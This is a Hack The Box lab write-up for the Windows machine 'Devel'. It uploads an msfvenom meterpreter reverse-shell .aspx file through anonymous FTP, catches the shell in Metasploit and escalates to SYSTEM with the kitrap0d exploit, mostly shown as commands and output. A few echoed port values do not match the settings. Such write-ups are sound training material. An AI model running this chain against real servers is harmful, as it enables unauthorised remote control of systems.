HackTheBox Devel

Devel is a retired Windows machine that is rated as Easy on Hack the Box. It is a beginner-level machine which can be completed using publicly available exploits.

Let’s get started

As always hacking starts with NMAP scan.

    Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-10 11:42 CET
    Nmap scan report for 10.10.10.5
    Host is up (0.039s latency).
    Not shown: 998 filtered ports
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     Microsoft ftpd
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    | 03-18-17  01:06AM       <DIR>          aspnet_client
    | 03-17-17  04:37PM                  689 iisstart.htm
    |_03-17-17  04:37PM               184946 welcome.png
    | ftp-syst:
    |_  SYST: Windows_NT
    80/tcp open  http    Microsoft IIS httpd 7.5
    | http-methods:
    |_  Potentially risky methods: TRACE
    |_http-server-header: Microsoft-IIS/7.5
    |_http-title: IIS7
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 13.45 seconds

From the results of NMAP we can see that port 21 and 80 are open. The NMAP also says that it’s a ISS 7 server. So here is the exploit plan, upload an .aspx through ftp, get the reverse shell and escalate the privilege.

    ftp 10.10.10.5
    Connected to 10.10.10.5.
    220 Microsoft FTP Service
    Name (10.10.10.5:ech0): anonymous
    331 Anonymous access allowed, send identity (e-mail name) as password.
    Password:
    230 User logged in.
    Remote system type is Windows_NT.

    ftp> dir
    200 PORT command successful.
    125 Data connection already open; Transfer starting.
    03-18-17  01:06AM       IR>          aspnet_client
    03-17-17  04:37PM                  689 iisstart.htm
    03-17-17  04:37PM               184946 welcome.png
    226 Transfer complete.

Trying to upload a file through `FTP`

    ftp> put test.html
PORT command successful.
Data connection already open; Transfer starting.
Transfer complete.
bytes sent in 0.000144 seconds (114 kbytes/s)

As we can see that FTP file trasfer is successful.

Generating Payload

I’m using msfvenom to generate the reverse shell payload.

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=5566 -f aspx > shell.aspx

    [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    [-] No arch selected, selecting arch: x86 from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 341 bytes
    Final size of aspx file: 2824 bytes

As the Payload has been successfully generated, It’s time to upload the file to the victim machine via FTP.

    ftp> put shell.aspx
PORT command successful.
Data connection already open; Transfer starting.
Transfer complete.
bytes sent in 0.000315 seconds (8.66 Mbytes/s)

Setting up the listner in msfconsole

    msf5 > use exploit/multi/handler

    msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp

    msf5 exploit(multi/handler) > set LHOST tun0
    LHOST => 10.10.*.*

    msf5 exploit(multi/handler) > set LPORT 5566
    LPORT => 9001

    msf5 exploit(multi/handler) > show options

    Module options (exploit/multi/handler):

    Name  Current Setting  Required  Description
    ----  ---------------  --------  -----------

    Payload options (windows/meterpreter/reverse_tcp):

    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
    LHOST     tun0      yes       The listen address (an interface may be specified)
    LPORT     5566             yes       The listen port

    Exploit target:

    Id  Name
    --  ----
    0   Wildcard Target

Running the exploit command and opening the shell.aspx in the browser, gave me a meterpreter session

    msf5 exploit(multi/handler) > exploit

    [*] Started reverse TCP handler on 10.10.*.*:5566
    [*] Sending stage (180291 bytes) to 10.10.10.5
    [*] Meterpreter session 1 opened (10.10.*.*:5566 -> 10.10.10.5:49158) 

    meterpreter > getuid
    Server username: IIS APPPOOL\Web

As seeing the UID, we need to escalate our privileges to gain NT/Authority.

Privilege Escalation

For this part we need a exploit suggester, so I went with a Exploit Suggester module use post/multi/recon/local_exploit_suggester from metasploit.

After the run of Exploit Suggester, I used exploit/windows/local/ms10_015_kitrap0d for PE.

    meterpreter > background
    [*] Backgrounding session 1...
    msf5 exploit(multi/handler) >

    msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d

    msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 1
    session => 1

    msf5 exploit(windows/local/ms10_015_kitrap0d) > set lhost tun0
    lhost => tun0

    msf5 exploit(windows/local/ms10_015_kitrap0d) > set lport 5577
    lport => 557

    msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit

    [*] Started reverse TCP handler on tun0:5577
    [*] Launching notepad to host the exploit...
    [+] Process 3372 launched.
    [*] Reflectively injecting the exploit DLL into 3372...
    [*] Injecting exploit into 3372 ...
    [*] Exploit injected. Injecting payload into 3372...
    [*] Payload injected. Executing exploit...
    [+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
    [*] Sending stage (179779 bytes) to 10.10.10.5
    [*] Meterpreter session 2 opened (10.10.*.*:5577 -> 10.10.10.5:49159)

    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM